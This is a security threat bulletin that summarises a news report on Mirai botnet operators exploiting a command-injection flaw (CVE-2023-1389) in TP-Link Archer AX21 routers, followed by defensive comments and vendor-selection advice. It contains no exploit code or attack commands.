Hackers Exploit TP-Link N-Day Flaw to Build Mirai Botnet

Cyber Security Threat Summary:
“Researchers from the Trend Micro's Zero Day Initiative said telemetry from Eastern Europe indicates that Mirai operators are exploiting a flaw in the TP-Link Archer AX21 firmware. The bug, CVE-2023-1389, allows attackers to inject a command into the router web management interface. A handful of teams competing in the December 2022 Pwn2Own competition in Toronto identified the flaw. TP-Link released a patch in mid-March. The Mirai botnet is a legacy of three Minecraft players who in 2016 unleashed the botnet, which infects internet of things devices running on an ARC processor, as part of an intended protection racket against DDoS attacks. Someone posted the code online, leading cybercriminals to assemble their own Mirai botnets. The original coders pleaded guilty to federal charges in 2017 and cooperated with the FBI. The Zero Day Initiative researchers said infections made with the newfound TP-Link Archer flaw are spreading beyond Eastern Europe into other locations around the globe. Analysis shows this version of Mirai takes pain to imitate legitimate traffic, "making it more difficult to separate DDoS traffic from legitimate network traffic." The speed of adoption of the flaw as a vector for the botnet malware is also notable, the researchers said. "Seeing this CVE being exploited so quickly after the patch being released is a clear demonstration of the decreasing 'time-to-exploit' speed that we continue to see across the industry” (BankInfoSec, 2023).

Security Officer Comments:
Perimeter Security technologies protect networks and businesses from malicious attacks by creating a defense system around the web. Criminals often target devices like these to gain access to internal or local networks. Robust security devices such as firewalls and intrusion prevention/detection systems can often prevent attacks like these. Botnets have been used to extort victims by carrying out malicious activities such as spam emails and DDoS attacks.

Suggested Corrections:
It is important for companies to select hardware vendors carefully in order to protect their business and customers. Organizations should only purchase equipment from reputable brands that offer extensive support and security updates for their products.

Link:
https://www.bankinfosecurity.com/hackers-exploit-tp-link-n-day-flaw-to-build-mirai-botnet-a-21866